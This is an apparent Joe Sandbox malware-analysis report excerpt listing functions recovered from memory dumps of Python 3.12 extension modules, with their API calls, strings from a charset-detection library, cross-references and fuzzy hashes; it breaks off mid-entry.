PyLong_FromSsize_t.PYTHON312(?,?,?,?,?,00007FFBAB6A7DCE), ref: 00007FFBAB6AE2AB
PyObject_RichCompareBool.PYTHON312(?,?,?,?,?,00007FFBAB6A7DCE), ref: 00007FFBAB6AE2C2
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A7DCE), ref: 00007FFBAB6AE2D8
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A7DCE), ref: 00007FFBAB6AE2EC

Strings

ratio, xrefs: 00007FFBAB6AE264

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
String ID: ratio
API String ID: 2538524772-4234197119
Opcode ID: b6db84d1c7e11e830000ef7b1fab697241f009562e2efea8cddf9bf8aca289d7
Instruction ID: 4facc7cbdd0f7017ccb75d88b372fddd5aa7dd344a5a51ef896d0333b3626f50
Opcode Fuzzy Hash: b6db84d1c7e11e830000ef7b1fab697241f009562e2efea8cddf9bf8aca289d7
Instruction Fuzzy Hash: 4441B6B294A60245EA629B7DDC54278F3B0BF49B94F14A234DE6C177B4DF3DE4418340

Function 00007FFBAA461000 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAA4610D3
PyUnicode_FromString.PYTHON312 ref: 00007FFBAA4610F8
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA4635B0

Strings

bidirectional, xrefs: 00007FFBAA4635A9
a unicode character, xrefs: 00007FFBAA46359B
argument, xrefs: 00007FFBAA4635A2

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
String ID: a unicode character$argument$bidirectional
API String ID: 1318908108-2110215792
Opcode ID: 5ca945e71462204c3220177ec9e6a27065e7f9c311bd085c84fc819a6770995f
Instruction ID: f2c55f16237191c60079ff4be3e138b02b7f2085208282a3113ef110d03bd668
Opcode Fuzzy Hash: 5ca945e71462204c3220177ec9e6a27065e7f9c311bd085c84fc819a6770995f
Instruction Fuzzy Hash: 5B41C5E2B1E682C2EF568B29D4543B92369EB44F90F445075EE5F87684CF3DE8928320

Function 00007FFBAB6AF530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON312(?,?,?,?,?,00007FFBAB6A8DEE), ref: 00007FFBAB6AF5CE
PyLong_FromSsize_t.PYTHON312(?,?,?,?,?,00007FFBAB6A8DEE), ref: 00007FFBAB6AF62B
PyObject_RichCompareBool.PYTHON312(?,?,?,?,?,00007FFBAB6A8DEE), ref: 00007FFBAB6AF642
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A8DEE), ref: 00007FFBAB6AF658
_Py_Dealloc.PYTHON312(?,?,?,?,?,00007FFBAB6A8DEE), ref: 00007FFBAB6AF66C

Strings

ratio, xrefs: 00007FFBAB6AF5E4

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
String ID: ratio
API String ID: 2538524772-4234197119
Opcode ID: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
Instruction ID: 3b595f5a33f908d6afb0da204b50edef24cbdbd5f3d1fb6feb47f764f3cc404b
Opcode Fuzzy Hash: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
Instruction Fuzzy Hash: 8E419CA2D4B60281EA265B3DDC142B8E3B0AF5DB90F08B238DE6D526B5DF3DE4408741

Function 00007FFBAB6A4FF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5012

Strings

'TooManySymbolOrPunctuationPlugin' object attribute '_symbol_count' cannot be deleted, xrefs: 00007FFBAB6A507C
attribute '_symbol_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB6A5008
int, xrefs: 00007FFBAB6A5106

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_symbol_count' cannot be deleted$attribute '_symbol_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
API String ID: 1450464846-2291034628
Opcode ID: 005893139290546e466727384096f8c4c27f16b4c59161034916739a6ab1bdf9
Instruction ID: 05ac86adab0b38dc18e483f18d966f442d193f13fb23e606437603b0d3a997bd
Opcode Fuzzy Hash: 005893139290546e466727384096f8c4c27f16b4c59161034916739a6ab1bdf9
Instruction Fuzzy Hash: 7B31AFF1B4A50281EE56DB3DECA43B8A3B0BF44B94F58A135DE6E067B5DE2CD4848700

Function 00007FFBAB6A85B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A85D2

Strings

attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A85C8
'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted, xrefs: 00007FFBAB6A863C
int, xrefs: 00007FFBAB6A86C6

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted$attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined$int
API String ID: 1450464846-528010561
Opcode ID: 2ca47d72e77a7153c4af469a22f98ddc2045af71414dbb353d6064c52d0c80cb
Instruction ID: 9ad931f2067ae44ed1ef2dae8f27b8a57e0e087311ba094e40dfe70de11b2d9f
Opcode Fuzzy Hash: 2ca47d72e77a7153c4af469a22f98ddc2045af71414dbb353d6064c52d0c80cb
Instruction Fuzzy Hash: AF3194B1B4A50281EE569B7DEC642B9A3B0BF44B94F58B135EE2D067F5DE2CD4848300

Function 00007FFBAB6A5C90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5CB2

Strings

attribute '_character_count' of 'UnprintablePlugin' undefined, xrefs: 00007FFBAB6A5CA8
int, xrefs: 00007FFBAB6A5DA6
'UnprintablePlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A5D1C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'UnprintablePlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'UnprintablePlugin' undefined$int
API String ID: 1450464846-2596148235
Opcode ID: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
Instruction ID: c9ba952a5385258769016842feea9f0f3e1541150c610b1e16d29946fe9ef714
Opcode Fuzzy Hash: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
Instruction Fuzzy Hash: 363183F1B4A50281EE56EB7DEC643B8B3B0AF44B94F58A135DE6E467B5DE2CD4848300

Function 00007FFBAB6A7C80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7CA2

Strings

'CjkInvalidStopPlugin' object attribute '_cjk_character_count' cannot be deleted, xrefs: 00007FFBAB6A7D0C
int, xrefs: 00007FFBAB6A7D96
attribute '_cjk_character_count' of 'CjkInvalidStopPlugin' undefined, xrefs: 00007FFBAB6A7C98

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'CjkInvalidStopPlugin' object attribute '_cjk_character_count' cannot be deleted$attribute '_cjk_character_count' of 'CjkInvalidStopPlugin' undefined$int
API String ID: 1450464846-399339277
Opcode ID: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
Instruction ID: 6ef31dc4fcbc792123d19176eb02f3bf37f84def70b5ef16646cad8821affdd7
Opcode Fuzzy Hash: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
Instruction Fuzzy Hash: 083194B1B4B50281EE569B7DEC642F9A3B0BF44B94F58A135DE6E067F5DE2CE4848300

Function 00007FFBAB6A5870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5892

Strings

attribute '_accentuated_count' of 'TooManyAccentuatedPlugin' undefined, xrefs: 00007FFBAB6A5888
'TooManyAccentuatedPlugin' object attribute '_accentuated_count' cannot be deleted, xrefs: 00007FFBAB6A58FC
int, xrefs: 00007FFBAB6A5986

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'TooManyAccentuatedPlugin' object attribute '_accentuated_count' cannot be deleted$attribute '_accentuated_count' of 'TooManyAccentuatedPlugin' undefined$int
API String ID: 1450464846-3693778415
Opcode ID: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
Instruction ID: b3e407f0d9e9706921d3cbe4c34b1a56a1c08a2b47f21cba2101b611bd50bbc3
Opcode Fuzzy Hash: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
Instruction Fuzzy Hash: A1316FF1A4A54281EE56DB7DECA43B8A3B0BF44B90F58A135DE6D066B5DE2CD4848300

Function 00007FFBAB6A8470 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8492

Strings

'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FFBAB6A84FC
int, xrefs: 00007FFBAB6A8586
attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A8488

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
API String ID: 1450464846-634379450
Opcode ID: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
Instruction ID: 9f34a10082e7408a06585a838115ac7101f9d113935c9e3f38839a5990acb25f
Opcode Fuzzy Hash: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
Instruction Fuzzy Hash: DA3185B1B4A50281EE569B7DEC642B8A370FF44B90F5CA135DE3D067B5DE2CD4848300

Function 00007FFBAB6A7860 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7882

Strings

attribute '_buffer_accent_count' of 'SuperWeirdWordPlugin' undefined, xrefs: 00007FFBAB6A7878
int, xrefs: 00007FFBAB6A7976
'SuperWeirdWordPlugin' object attribute '_buffer_accent_count' cannot be deleted, xrefs: 00007FFBAB6A78EC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_buffer_accent_count' cannot be deleted$attribute '_buffer_accent_count' of 'SuperWeirdWordPlugin' undefined$int
API String ID: 1450464846-76466605
Opcode ID: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
Instruction ID: 00fe87da7705dc53ab85f12caa4f35e694a9230059030670429dc57cc4f5b41a
Opcode Fuzzy Hash: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
Instruction Fuzzy Hash: 173190B1B4A50281EE469B7DECA42F9A3B0AF44B90F58A135DE3D067F5DE2CE4848300

Function 00007FFBAB6A7640 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7662

Strings

attribute '_bad_character_count' of 'SuperWeirdWordPlugin' undefined, xrefs: 00007FFBAB6A7658
int, xrefs: 00007FFBAB6A7756
'SuperWeirdWordPlugin' object attribute '_bad_character_count' cannot be deleted, xrefs: 00007FFBAB6A76CC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_bad_character_count' cannot be deleted$attribute '_bad_character_count' of 'SuperWeirdWordPlugin' undefined$int
API String ID: 1450464846-2709777744
Opcode ID: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
Instruction ID: ee6136d73b1f49120c96c98de51e16b51bc59d8d9c049847599c35ec3b1d1aa7
Opcode Fuzzy Hash: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
Instruction Fuzzy Hash: F531A1B1B4A50281EE469B3DEC642F9A3B0BF44B90F58B135DE2D077B5EE2CE4848700

Function 00007FFBAB6A6820 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A6842

Strings

attribute '_character_count' of 'SuspiciousRange' undefined, xrefs: 00007FFBAB6A6838
'SuspiciousRange' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A68AC
int, xrefs: 00007FFBAB6A6936

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuspiciousRange' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousRange' undefined$int
API String ID: 1450464846-3882440367
Opcode ID: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
Instruction ID: 48fe6cc754ceb94ae81829844e8aa7c3ea873c24d5cb0b7f58f04852641b88fb
Opcode Fuzzy Hash: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
Instruction Fuzzy Hash: A631A1B1B4A50281EE569B7DECA42B8E3B0FF44B94F58A135DE6E077B4DE2CD4848310

Function 00007FFBAB6A7020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7042

Strings

attribute '_word_count' of 'SuperWeirdWordPlugin' undefined, xrefs: 00007FFBAB6A7038
int, xrefs: 00007FFBAB6A7136
'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted, xrefs: 00007FFBAB6A70AC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
API String ID: 1450464846-1212817586
Opcode ID: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
Instruction ID: d34dc1b1b9e0e859cdb3b4f983dd324622e3bb75bd093b81b28d392a8c26d4ce
Opcode Fuzzy Hash: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
Instruction Fuzzy Hash: C93185F1B4A50241EE569B7DECA52B9A3B0AF44B90F58A135DE2D067F5DE2CD4848300

Function 00007FFBAB6A7500 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7522

Strings

'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A758C
attribute '_character_count' of 'SuperWeirdWordPlugin' undefined, xrefs: 00007FFBAB6A7518
int, xrefs: 00007FFBAB6A7616

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuperWeirdWordPlugin' undefined$int
API String ID: 1450464846-3920090044
Opcode ID: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
Instruction ID: f655ffdaab3f97a271732506b967190e9b95db8d3d4e67df87e8202d8bbe0419
Opcode Fuzzy Hash: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
Instruction Fuzzy Hash: F13185B1B4A50285EE469B7DECA42B9A3B0AF44B94F58B135DE3D067B5DE2CD4848300

Function 00007FFBAB6A86F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8712

Strings

'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB6A877C
attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A8708
int, xrefs: 00007FFBAB6A8806

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined$int
API String ID: 1450464846-4184598959
Opcode ID: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
Instruction ID: 8dc255dc224c74af947620a32a6c1ca5727a3ca5829776d4991599e1acf2bdfc
Opcode Fuzzy Hash: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
Instruction Fuzzy Hash: C63198B1B4A50285EE469B7DEC652B8E370AF44B90F5CA135DE2D067B5DE2CE484C300

Function 00007FFBAB6A66E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A6702

Strings

attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined, xrefs: 00007FFBAB6A66F8
int, xrefs: 00007FFBAB6A67F6
'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted, xrefs: 00007FFBAB6A676C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted$attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined$int
API String ID: 1450464846-916769388
Opcode ID: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
